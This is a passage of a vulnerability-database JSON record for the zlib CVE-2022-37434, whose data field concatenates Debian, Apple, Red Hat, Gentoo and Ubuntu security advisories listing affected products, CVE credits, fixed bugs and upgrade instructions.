"data": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference). \n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 1:1.2.11.dfsg-2+deb11u2. \n\nWe recommend that you upgrade your zlib packages. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2022-10-27-12 Additional information for APPLE-SA-2022-10-24-5 watchOS 9.1\n\nwatchOS 9.1 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213491. \n\nAppleMobileFileIntegrity\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to modify protected parts of the file\nsystem\nDescription: This issue was addressed by removing additional\nentitlements. \nCVE-2022-42825: Mickey Jin (@patch1t)\n\nApple Neural Engine\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges \nDescription: The issue was addressed with improved memory handling. \nCVE-2022-32932: Mohamed Ghannam (@_simo36)\nEntry added October 27, 2022\n\nAudio\nAvailable for: Apple Watch Series 4 and later\nImpact: Parsing a maliciously crafted audio file may lead to\ndisclosure of user information \nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42798: Anonymous working with Trend Micro Zero Day\nInitiative\nEntry added October 27, 2022\n\nAVEVideoEncoder\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved bounds checks. \nCVE-2022-32940: ABC Research s.r.o. \n\nCFNetwork\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A certificate validation issue existed in the handling\nof WKWebView. This issue was addressed with improved validation. \nCVE-2022-42813: Jonathan Zhang of Open Computing Facility\n(ocf.berkeley.edu)\n\nGPU Drivers\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-32947: Asahi Lina (@LinaAsahi)\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-32924: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: A remote user may be able to cause kernel code execution\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2022-42808: Zweig of Kunlun Lab\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2022-32944: Tim Michaud (@TimGMichaud) of Moveworks.ai\nEntry added October 27, 2022\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges \nDescription: A race condition was addressed with improved locking. \nCVE-2022-42803: Xinru Chi of Pangu Lab, John Aakerblom (@jaakerblom)\nEntry added October 27, 2022\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app with root privileges may be able to execute arbitrary\ncode with kernel privileges \nDescription: The issue was addressed with improved bounds checks. \nCVE-2022-32926: Tim Michaud (@TimGMichaud) of Moveworks.ai\nEntry added October 27, 2022\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges \nDescription: A logic issue was addressed with improved checks. \nCVE-2022-42801: Ian Beer of Google Project Zero\nEntry added October 27, 2022\n\nSafari\nAvailable for: Apple Watch Series 4 and later\nImpact: Visiting a maliciously crafted website may leak sensitive\ndata \nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2022-42817: Mir Masood Ali, PhD student, University of Illinois\nat Chicago; Binoy Chitale, MS student, Stony Brook University;\nMohammad Ghasemisharif, PhD Candidate, University of Illinois at\nChicago; Chris Kanich, Associate Professor, University of Illinois at\nChicago\nEntry added October 27, 2022\n\nSandbox\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to access user-sensitive data\nDescription: An access issue was addressed with additional sandbox\nrestrictions. \nCVE-2022-42811: Justin Bui (@slyd0g) of Snowflake\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Visiting a malicious website may lead to user interface\nspoofing\nDescription: The issue was addressed with improved UI handling. \nWebKit Bugzilla: 243693\nCVE-2022-42799: Jihwan Kim (@gPayl0ad), Dohyun Lee (@l33d0hyun)\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A type confusion issue was addressed with improved\nmemory handling. \nWebKit Bugzilla: 244622\nCVE-2022-42823: Dohyun Lee (@l33d0hyun) of SSD Labs\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may disclose\nsensitive user information\nDescription: A logic issue was addressed with improved state\nmanagement. \nWebKit Bugzilla: 245058\nCVE-2022-42824: Abdulrahman Alqabandi of Microsoft Browser\nVulnerability Research, Ryan Shin of IAAI SecLab at Korea University,\nDohyun Lee (@l33d0hyun) of DNSLab at Korea University\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may disclose\ninternal states of the app \nDescription: A correctness issue in the JIT was addressed with\nimproved checks. \nWebKit Bugzilla: 242964\nCVE-2022-32923: Wonyoung Jung (@nonetype_pwn) of KAIST Hacking Lab\nEntry added October 27, 2022\n\nzlib\nAvailable for: Apple Watch Series 4 and later\nImpact: A user may be able to cause unexpected app termination or\narbitrary code execution \nDescription: This issue was addressed with improved checks. \nCVE-2022-37434: Evgeny Legerov\nCVE-2022-42800: Evgeny Legerov\nEntry added October 27, 2022\n\nAdditional recognition\n\niCloud\nWe would like to acknowledge Tim Michaud (@TimGMichaud) of\nMoveworks.ai for their assistance. \n\nKernel\nWe would like to acknowledge Peter Nguyen of STAR Labs, Tim Michaud\n(@TimGMichaud) of Moveworks.ai, Tommy Muir (@Muirey03) for their\nassistance. \n\nWebKit\nWe would like to acknowledge Maddie Stone of Google Project Zero,\nNarendra Bhati (@imnarendrabhati) of Suma Soft Pvt. Ltd., an\nanonymous researcher for their assistance. \n\nInstructions on how to update your Apple Watch software are available\nat https://support.apple.com/kb/HT204641 To check the version on\nyour Apple Watch, open the Apple Watch app on your iPhone and select\n\"My Watch \u003e General \u003e About\". Alternatively, on your watch, select\n\"My Watch \u003e General \u003e About\". \nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKpQACgkQ4RjMIDke\nNxndmQ/9FlBich1M+naXLmjo/AyBTdlmBdFUH6cU92PspO7vrzTZl3Gl3dSjvGg0\nTU7AGeAAvr278Zra0Hrm+D+w2BMAd3SSIjBXyum02lx0AGyyAFaPEDVq4CpxnqUG\nAEqBRrgoU9yZpTrIQXZlsnqphdv3KLVDzqqKlZjkPzIboYJ0I0c0HMP54618kx1n\noBtoEEjPrIhH9LJyt37FbtgRntCzuuyistaxKGugZo4UDUt8hkHLKpYHf/5BNfWl\n/SaX1sy1ZJBoOezMC7/egaHPBbJRDnU3dXSQ7ON7h6w1Tc9NeUjXP0wf8BByeIko\nzJF5StfqfBKa3fR8wl0uM4CWDuHVtVjHAv5lWSqEQoEFoAjud+Ajjr5j3DJegVW7\nXp5Xu7W2XRR03dCM/SCQXMttr/Eu7z4EPJZD1W5y/UYH+ZwF4tq+4fxdrLOzPh4j\nuDLW+CWvF0d/+lVINDXzvzfQwEk77fbFJtUwL6Z5Sq95rtIL0/1OgtK/F/ODeyAX\n8xYDCVdbn84K0/5K58NsvLS01XKXGISVY5yWrf3R7f69AVq7aiaaREY71pkuIwKf\n+aGpuOJibybGZqIOedMES/FCYuUqZF/0N7TJH8LpmlYt/T+fXjeJkupdeT+2vpcX\niq3rTxsee+WgHhuR/3utIdIFZwVvgZBOadtHO6vIOQ1ce1QyLqI=\n=ZTUZ\n-----END PGP SIGNATURE-----\n\n\n. Description:\n\nThe rh-sso-7/sso76-openshift-rhel8 container image and\nrh-sso-7/sso7-rhel8-operator operator has been updated for RHEL-8 based\nMiddleware Containers to address the following security issues. Users of these images\nare also encouraged to rebuild all container images that depend on these\nimages. \n\nDockerfiles and scripts should be amended either to refer to this new image\nspecifically, or to the latest image generally. Bugs fixed (https://bugzilla.redhat.com/):\n\n2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding\n2141404 - CVE-2022-3916 keycloak: Session takeover with OIDC offline refreshtokens\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nCIAM-4412 - Build new OCP image for rh-sso-7/sso76-openshift-rhel8\nCIAM-4413 - Generate new operator bundle image for this patch\n\n6. Bugs fixed (https://bugzilla.redhat.com/):\n\n2134010 - CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-2674 - Many `can\u0027t remove non-existent inotify watch for: /var/log/pods/xxxxxx` errors in logfilesmetricexporter container. \nLOG-3042 - Logging view plugin removes part of LogQL query\nLOG-3049 - [release-5.5] Resources associated with collector / fluentd keep on getting recreated\nLOG-3127 - The alerts are Fluentd when type=vector\nLOG-3138 - [release-5.5] the content of secret elasticsearch-metrics-token is recreated continually\nLOG-3175 - [release-5.5] Vector healthcheck fails when forwarding logs to Cloudwatch\nLOG-3213 - must-gather is empty for logging with CLO image\nLOG-3234 - [release-5.5] Loki gateway is crashing because cipher-suites are not set\nLOG-3251 - [release-5.5] Adding Valid Subscription Annotation\n\n6. Bugs fixed (https://bugzilla.redhat.com/):\n\n2129679 - clusters belong to global clusterset is not selected by placement when rescheduling\n2134609 - CVE-2022-3517 nodejs-minimatch: ReDoS via the braceExpand function\n2139085 - RHACM 2.6.3 images\n2149181 - CVE-2022-41912 crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements\n\n5. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.4.8 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. Bugs fixed (https://bugzilla.redhat.com/):\n\n2101669 - CVE-2022-2238 search-api: SQL injection leads to remote denial of service\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2121068 - CVE-2022-35949 nodejs: undici.request vulnerable to SSRF\n2121101 - CVE-2022-35948 nodejs: undici vulnerable to CRLF via content headers\n2126277 - CVE-2022-25858 terser: insecure use of regular expressions leads to ReDoS\n2130745 - RHACM 2.4.8 images\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2042826 - [SNO] the replicas of ingresscontroller/default is 2 on new installed SNO private cluster\n2092839 - Downward API (annotations) is missing PCI information when using the tuning metaPlugin on SR-IOV Networks\n2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3)\n2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3)\n2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3)\n2092928 - CVE-2022-26945 go-getter: command injection vulnerability\n2099800 - Bump to kubernetes 1.24.6\n2109487 - machine-controller is case sensitive which can lead to false/positive errors\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nOCPBUGS-1099 - Missing $SEARCH domain in /etc/resolve.conf for OCP v4.9.31 cluster\nOCPBUGS-1346 - OpenStack UPI scripts do not create server group for Computes\nOCPBUGS-1658 - Whereabouts should allow non default interfaces to Pod IP list [backport 4.11]\nOCPBUGS-1713 - Kuryr-Controller Restarting on KuryrPort with missing pod\nOCPBUGS-1955 - [4.11] Dual stack cluster fails on installation when multi-path routing entries exist\nOCPBUGS-1972 - [IPI on Baremetal] ipv6 support issue in metal3-httpd\nOCPBUGS-1984 - Install Helm chart form doesn\u0027t allow the user select a specific version\nOCPBUGS-2011 - [4.11] ironic clear_job_queue and reset_idrac pending issues\nOCPBUGS-2014 - CI: Backend unit tests fails because devfile registry was updated (mock response)\nOCPBUGS-2042 - [2102088] 4.11 CatalogSourcesUnhealthy error in subscription When upgrading ptp-operator\nOCPBUGS-2046 - Remove policy/v1beta1 in 4.11 and later\nOCPBUGS-2050 - [release-4.11] DNS operator does not reconcile the openshift-dns namespace\nOCPBUGS-2092 - Use floating tags in golang imagestream\nOCPBUGS-2112 - [release-4.11] Address e2e failures due to pod security\nOCPBUGS-2113 - [4.11] etcd and kube-apiserver pods get restarted due to failed liveness probes while deleting/re-creating pods on SNO\nOCPBUGS-2140 - member loses rights after some other user login in openid / group sync\nOCPBUGS-2293 - CVO skips reconciling the installed optional resources in the 4.11 to 4.12 upgrade\nOCPBUGS-2320 - [release-4.11] Remove namespace and name from gathered DVO metrics\nOCPBUGS-2451 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name\nOCPBUGS-2528 - dns-default pod missing \"target.workload.openshift.io/management:\" annotation\nOCPBUGS-2606 - [release-4.11] go.mod should beworking with golang-1.17 and golang-1.18\nOCPBUGS-2616 - e2e-gcp-builds is permafailing\nOCPBUGS-2626 - Worker creation fails within provider networks (as primary and secondary)\nOCPBUGS-2640 - prometheus-k8s-0 ends in CrashLoopBackOff with evel=error err=\"opening storage failed: /prometheus/chunks_head/000002: invalid magic number 0\" on SNO after hard reboot tests\nOCPBUGS-2658 - [4.11] VPA E2Es fail due to CSV name mismatch\nOCPBUGS-2766 - \u0027oc login\u0027 should be robust in the face of gather failures\nOCPBUGS-2780 - Import: Advanced option sentence is splited into two parts and headlines has no padding\nOCPBUGS-449 - KubeDaemonSetRolloutStuck alert using incorrect metric in 4.9 and 4.10\nOCPBUGS-526 - Prerelease report bug link should be updated to JIRA instead of Bugzilla\nOCPBUGS-668 - Prefer local dns does not work expectedly on OCPv4.11\nOCPBUGS-673 - crio occasionally fails to start during deployment\nOCPBUGS-689 - [2112237] [ Cluster storage Operator 4.x(10/11) ] DefaultStorageClassController report fake message \"No default StorageClass for this platform\" on Alicloud, IBM\nOCPBUGS-744 - [4.11] Spoke BMH stuck ?provisioning? after changing a BIOS attribute via the converged workflow\nOCPBUGS-947 - [4.11] Rebase openshift/etcd 4.11 onto 3.5.5\nOCPBUGS-955 - [2087981] PowerOnVM_Task is deprecated use PowerOnMultiVM_Task for DRS ClusterRecommendation\n\n6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202210-42\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: zlib: Multiple vulnerabilities\n Date: October 31, 2022\n Bugs: #863851, #835958\n ID: 202210-42\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nA buffer overflow in zlib might allow an attacker to cause remote code\nexecution. \n\nBackground\n==========\n\nzlib is a widely used free and patent unencumbered data compression\nlibrary. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 sys-libs/zlib \u003c 1.2.12-r3 \u003e= 1.2.12-r3\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in zlib. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n======\n\nMaliciously crafted input handled by zlib may result in remote code\nexecution. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll zlib users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=sys-libs/zlib-1.2.12-r3\"\n\nReferences\n==========\n\n[ 1 ] CVE-2018-25032\n https://nvd.nist.gov/vuln/detail/CVE-2018-25032\n[ 2 ] CVE-2022-37434\n https://nvd.nist.gov/vuln/detail/CVE-2022-37434\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202210-42\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. Description:\n\nLogging Subsystem 5.5.5 - Red Hat OpenShift\n\nSecurity Fixe(s):\n\n* jackson-databind: denial of service via a large depth of nested\nobjects (CVE-2020-36518)\n\n* golang: net/http: handle server errors after sending GOAWAY\n(CVE-2022-27664)\n\n* golang: archive/tar: unbounded memory consumption when reading headers\n(CVE-2022-2879, CVE-2022-2880, CVE-2022-41715)\n\n* jackson-databind: deep wrapper array nesting wrt\nUNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)\n\n* jackson-databind: use of deeply nested arrays (CVE-2022-42004)\n\n* loader-utils: Regular expression denial of service (CVE-2022-37603)\n\n* golang: math/big: decoding big.Float and big.Rat types can panic if the\nencoded message is too short, potentially allowing a denial of service\n(CVE-2022-32189)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects\n2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service\n2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY\n2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers\n2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters\n2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps\n2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS\n2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays\n2140597 - CVE-2022-37603 loader-utils:Regular expression denial of service\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-2860 - Error on LokiStack Components when forwarding logs to Loki on proxy cluster\nLOG-3131 - vector: kube API server certificate validation failure due to hostname mismatch\nLOG-3222 - [release-5.5] fluentd plugin for kafka ca-bundle secret doesn\u0027t support multiple CAs\nLOG-3226 - FluentdQueueLengthIncreasing rule failing to be evaluated. \nLOG-3284 - [release-5.5][Vector] logs parsed into structured when json is set without structured types. \nLOG-3287 - [release-5.5] Increase value of cluster-logging PriorityClass to move closer to system-cluster-critical value\nLOG-3301 - [release-5.5][ClusterLogging] elasticsearchStatus in ClusterLogging instance CR is not updated when Elasticsearch status is changed\nLOG-3305 - [release-5.5] Kibana Authentication Exception cookie issue\nLOG-3310 - [release-5.5] Can\u0027t choose correct CA ConfigMap Key when creating lokistack in Console\nLOG-3332 - [release-5.5] Reconcile error on controller when creating LokiStack with tls config\n\n6. ==========================================================================\nUbuntu Security Notice USN-6736-1\nApril 16, 2024\n\nklibc vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 23.10\n- Ubuntu 22.04 LTS\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS (Available with Ubuntu Pro)\n- Ubuntu 16.04 LTS (Available with Ubuntu Pro)\n- Ubuntu 14.04 LTS (Available with Ubuntu Pro)\n\nSummary:\n\nSeveral security issues were fixed in klibc. \n\nSoftware Description:\n- klibc: small utilities built with klibc for early boot\n\nDetails:\n\nIt was discovered that zlib, vendored in klibc, incorrectly handled pointer\narithmetic. An attacker could use this issue to cause klibc to crash or to\npossibly execute arbitrary code. (CVE-2016-9840, CVE-2016-9841)\n\nDanilo Ramos discovered that zlib, vendored in klibc, incorrectly handled\nmemory when performing certain deflating operations. An attacker could use\nthis issue to cause klibc to crash or to possibly execute arbitrary code. \n(CVE-2018-25032)\n\nEvgeny Legerov discovered that zlib, vendored in klibc, incorrectly handled\nmemory when performing certain inflate operations. An attacker could use\nthis issue to cause klibc to crash or to possibly execute arbitrary code. \n(CVE-2022-37434)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 23.10:\n klibc-utils 2.0.13-1ubuntu0.1\n libklibc 2.0.13-1ubuntu0.1\n\nUbuntu 22.04 LTS:\n klibc-utils 2.0.10-4ubuntu0.1\n libklibc 2.0.10-4ubuntu0.1\n\nUbuntu 20.04 LTS:\n klibc-utils 2.0.7-1ubuntu5.2\n libklibc 2.0.7-1ubuntu5.2\n\nUbuntu 18.04 LTS (Available with Ubuntu Pro):\n klibc-utils 2.0.4-9ubuntu2.2+esm1\n libklibc 2.0.4-9ubuntu2.2+esm1\n\nUbuntu 16.04 LTS (Available with Ubuntu Pro):\n klibc-utils 2.0.4-8ubuntu1.16.04.4+esm2\n libklibc 2.0.4-8ubuntu1.16.04.4+esm2\n\nUbuntu 14.04 LTS (Available with Ubuntu Pro):\n klibc-utils 2.0.3-0ubuntu1.14.04.3+esm3\n libklibc 2.0.3-0ubuntu1.14.04.3+esm3\n\nIn general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: OpenShift Container Platform 4.11.45 bug fix and security update\nAdvisory ID: RHSA-2023:4053-01\nProduct: Red Hat OpenShift Enterprise\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:4053\nIssue date: 2023-07-19\nCVE Names: CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 \n CVE-2019-20838 CVE-2020-14155 CVE-2020-24370 \n CVE-2020-35525 CVE-2020-35527 CVE-2021-3580 \n CVE-2021-3634 CVE-2021-20231 CVE-2021-20232 \n CVE-2021-23177 CVE-2021-31566 CVE-2021-36084 \n CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 \n CVE-2021-40528 CVE-2022-1271 CVE-2022-1586 \n CVE-2022-1785 CVE-2022-1897 CVE-2022-1927 \n CVE-2022-4304 CVE-2022-4450 CVE-2022-21235 \n CVE-2022-24407 CVE-2022-29824 CVE-2022-34903 \n CVE-2022-37434 CVE-2022-38177 CVE-2022-38178 \n CVE-2022-40674 CVE-2022-42010 CVE-2022-42011 \n CVE-2022-42012 CVE-2022-42898 CVE-2022-47629 \n CVE-2023-0215 CVE-2023-0361 CVE-2023-1281 \n CVE-2023-24329 CVE-2023-32233 \n=====================================================================\n\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.11.45 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nThis release includes a security update for Red Hat OpenShift Container\nPlatform 4.11. \n\nRed Hat Product Security has rated this update as having a security impact\nof [impact]. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.11.45. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2023:4052\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html\n\nSecurity Fix(es):\n\n* github.com/Masterminds/vcs: Command Injection via argument injection\n(CVE-2022-21235)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAll OpenShift Container Platform 4.11 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift CLI (oc)\nor web console. Instructions for upgrading a cluster are available at\nhttps://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.11 see the following documentation,\nwhich will be updated shortly for this release, for important instructions\non how to upgrade your cluster and fully apply this asynchronous errata\nupdate:\n\nhttps://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html\n\nYou may download the oc tool and use it to inspect release image metadata\nfor x86_64, s390x, ppc64le, and aarch64 architectures. The image digests\nmay be found at\nhttps://quay.io/repository/openshift-release-dev/ocp-release?tab=tags. \n\nThe sha values for the release are\n\n(For x86_64 architecture)\nThe image digest is\nsha256:c6771b12bd873c0e3e5fbc7afa600d92079de6534dcb52f09cb1d22ee49608a9\n\n(For s390x architecture)\nThe image digest is\nsha256:622b5361f95d1d512ea84f363ac06155cbb9ee28e85ccaae1acd80b98b660fa8\n\n(For ppc64le architecture)\nThe image digest is\nsha256:50c131cf85dfb00f258af350a46b85eff8fb8084d3e1617520cd69b59caeaff7\n\n(For aarch64 architecture)\nThe image digest is\nsha256:9e575c4ece9caaf31acbef246ccad71959cd5bf634e7cb284b0849ddfa205ad7\n\nAll OpenShift Container Platform 4.11 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift CLI (oc)\nor web console. Instructions for upgrading a cluster are available at\nhttps://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2215317 - CVE-2022-21235 github.com/Masterminds/vcs: Command Injection via argument injection\n\n5. JIRA issues fixed (https://issues.redhat.com/):\n\nOCPBUGS-15446 - (release-4.11) gather \"gateway-mode-config\" config map from \"openshift-network-operator\" namespace\nOCPBUGS-15532 - visiting Configurations page returns error Cannot read properties of undefined (reading \u0027apiGroup\u0027)\nOCPBUGS-15645 - Can\u0027t use git lfs in BuildConfig git source with strategy Docker\nOCPBUGS-15739 - Environment cannot find Python\nOCPBUGS-15758 - [release-4.11] Bump Jenkins and Jenkins Agent Base image versions\nOCPBUGS-15942 - 9% of OKD tests failing on error: tag latest failed: Internal error occurred: registry.centos.org/dotnet/dotnet-31-centos7:latest: Get \"https://registry.centos.org/v2/\": dial tcp: lookup registry.centos.org on 172.30.0.10:53: no such host\nOCPBUGS-15966 - [4.12] MetalLB contains incorrect data Correct and incorrect MetalLB resources coexist should have correct statuses\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-17594\nhttps://access.redhat.com/security/cve/CVE-2019-17595\nhttps://access.redhat.com/security/cve/CVE-2019-18218\nhttps://access.redhat.com/security/cve/CVE-2019-20838\nhttps://access.redhat.com/security/cve/CVE-2020-14155\nhttps://access.redhat.com/security/cve/CVE-2020-24370\nhttps://access.redhat.com/security/cve/CVE-2020-35525\nhttps://access.redhat.com/security/cve/CVE-2020-35527\nhttps://access.redhat.com/security/cve/CVE-2021-3580\nhttps://access.redhat.com/security/cve/CVE-2021-3634\nhttps://access.redhat.com/security/cve/CVE-2021-20231\nhttps://access.redhat.com/security/cve/CVE-2021-20232\nhttps://access.redhat.com/security/cve/CVE-2021-23177\nhttps://access.redhat.com/security/cve/CVE-2021-31566\nhttps://access.redhat.com/security/cve/CVE-2021-36084\nhttps://access.redhat.com/security/cve/CVE-2021-36085\nhttps://access.redhat.com/security/cve/CVE-2021-36086\nhttps://access.redhat.com/security/cve/CVE-2021-36087\nhttps://access.redhat.com/security/cve/CVE-2021-40528\nhttps://access.redhat.com/security/cve/CVE-2022-1271\nhttps://access.redhat.com/security/cve/CVE-2022-1586\nhttps://access.redhat.com/security/cve/CVE-2022-1785\nhttps://access.redhat.com/security/cve/CVE-2022-1897\nhttps://access.redhat.com/security/cve/CVE-2022-1927\nhttps://access.redhat.com/security/cve/CVE-2022-4304\nhttps://access.redhat.com/security/cve/CVE-2022-4450\nhttps://access.redhat.com/security/cve/CVE-2022-21235\nhttps://access.redhat.com/security/cve/CVE-2022-24407\nhttps://access.redhat.com/security/cve/CVE-2022-29824\nhttps://access.redhat.com/security/cve/CVE-2022-34903\nhttps://access.redhat.com/security/cve/CVE-2022-37434\nhttps://access.redhat.com/security/cve/CVE-2022-38177\nhttps://access.redhat.com/security/cve/CVE-2022-38178\nhttps://access.redhat.com/security/cve/CVE-2022-40674\nhttps://access.redhat.com/security/cve/CVE-2022-42010\nhttps://access.redhat.com/security/cve/CVE-2022-42011\nhttps://access.redhat.com/security/cve/CVE-2022-42012\nhttps://access.redhat.com/security/cve/CVE-2022-42898\nhttps://access.redhat.com/security/cve/CVE-2022-47629\nhttps://access.redhat.com/security/cve/CVE-2023-0215\nhttps://access.redhat.com/security/cve/CVE-2023-0361\nhttps://access.redhat.com/security/cve/CVE-2023-1281\nhttps://access.redhat.com/security/cve/CVE-2023-24329\nhttps://access.redhat.com/security/cve/CVE-2023-32233\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-37434"
},
{
"db": "VULHUB",
"id": "VHN-428208"
},
{
"db": "VULMON",
"id": "CVE-2022-37434"
},
{
